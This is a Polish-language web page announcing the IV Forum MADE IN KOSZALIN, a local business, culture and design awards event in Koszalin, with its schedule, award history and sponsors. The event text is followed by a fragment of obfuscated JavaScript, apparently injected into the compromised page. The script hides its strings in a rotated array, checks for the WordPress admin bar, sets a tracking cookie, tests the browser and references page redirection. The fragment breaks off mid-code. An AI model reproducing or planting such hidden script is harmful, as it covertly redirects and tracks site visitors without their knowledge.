IV Forum MADE IN KOSZALIN | Północna Izba Gospodarcza w Koszalinie

Centrum Biznesu Fundacji CIP zaprasza na IV Forum MADE IN KOSZALIN, które odbędzie się 7 grudnia br. w City Box, Rynek Staromiejski 14 w Koszalinie.

Ideą Forum MADE IN KOSZALIN jest promowanie patriotyzmu lokalnego, designu oraz firm i wydarzeń, z których Koszalin jest dumny.

W drodze otwartych nominacji w październiku b.r. mieszkańcy Koszalina zgłaszali nominacje do nagród Laury MADE IN KOSZALIN 2018. Wpłynęło ich aż 250 w 3 kategoriach: biznes, kultura i design oraz styl życia i inspiracje.

Decyzją Kapituły IV Forum MADE IN KOSZALIN wybrano finalistów oraz laureatów Laurów MADE IN KOSZALIN 2018.

Podczas Forum w dniu 7 grudnia zaprezentowani zostaną finaliści –  wyjątkowe koszalińskie firmy, wydarzenia i osoby, a wybitne oraz te, które w najlepszy sposób promują Koszalin nagrodzone zostaną Laurami MADE IN KOSZALIN 2018.

PROGRAM

10.00 - 10.15- otwarcie IV Forum MADE IN KOSZALIN
10.15 - 13.00 Kategoria: BIZNES

Prezentacje finalistów, wręczenie nagród LAURY MADE IN KOSZALIN 2018

13.00 wręczenie certyfikatów MADE IN KOSZALIN firmom i instytucjom przyjętym do inicjatywy w 2018 roku
13.00 – 13.30 lunch
13.30 – 14.30 Kategoria: KULTURA I DESIGN

Prezentacje finalistów, wręczenie nagród LAURY MADE IN KOSZALIN 2018

14.30 – 14.45 przerwa kawowa
14.45 – 15.45 Kategoria: STYL ŻYCIA I INSPIRACJE

Prezentacje finalistów, wręczenie nagród LAURY MADE IN KOSZALIN 2018

15.45-16.00 Podsumowanie IV Forum MADE IN KOSZALIN

Zgodnie z ideą MADE IN KOSZALIN zarówno wydarzenia i firmy, które prezentują się oraz zostają nagrodzone podczas FORUM MADE IN KOSZALIN są tworzone i powstają dzięki koszalinianom, ale również nagrody LAURY MADE IN KOSZALIN mają iście koszaliński charakter.

LAURY MADE IN KOSZALIN 2015 miały formę szklanego laura i zostały zaprojektowane przez koszalińskiego artystę Piotra Stramskiego, ceramiczne LAURY MADE IN KOSZALIN 2016 powstały w Warsztacie Terapii Zajęciowej Nr 2 w Koszalinie działającym przy Polskim Stowarzyszeniu na rzecz Osób z Niepełnosprawnością  Intelektualną. W 2017 roku wykonane z drewna – LAURY MADE IN KOSZALIN 2017 zostały zaprojektowane oraz wykonane w firmie MOYA PRACOWNIA z Koszalina. W tym roku Laury MADE IN KOSZALIN powstają w firmie Inter-metal s.c.

Materiały promocyjne związane z Forum – plakaty, zaproszenia itp. zaprojektowała Justyna Matysiak z Instytutu Wzornictwa Politechniki Koszalińskiej.

Prezydent Miasta Koszalina Piotr Jedliński objął IV Forum MADE IN KOSZALIN patronatem honorowym, natomiast patronat medialny nad Forum objęli: Radio Koszalin, GK24, Tygodnik MIASTO, TV MAX, PRESTIŻ magazyn koszaliński.

Partnerami wydarzenia są: Park Technologiczny S.A., Koszalińska Izba Przemysłowo-Handlowa, Północna Izba Gospodarcza  w Koszalinie, Zachodniopomorski Związek Przedsiębiorców i Pracodawców, Politechnika Koszalińska oraz Instytut Wzornictwa.

IV Forum MADE IN KOSZALIN dofinansowano z budżetu Gminy Miasta Koszalina.

Udział w Forum jest bezpłatny. Potwierdzenia udziału przyjmujemy do 30 listopada – formularz zgłoszeniowy w załączniku.

Szczegóły: http://biznes.koszalin.pl/kalendarz/iv-forum-made-in-koszalin-koszalin-7-grudnia/

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m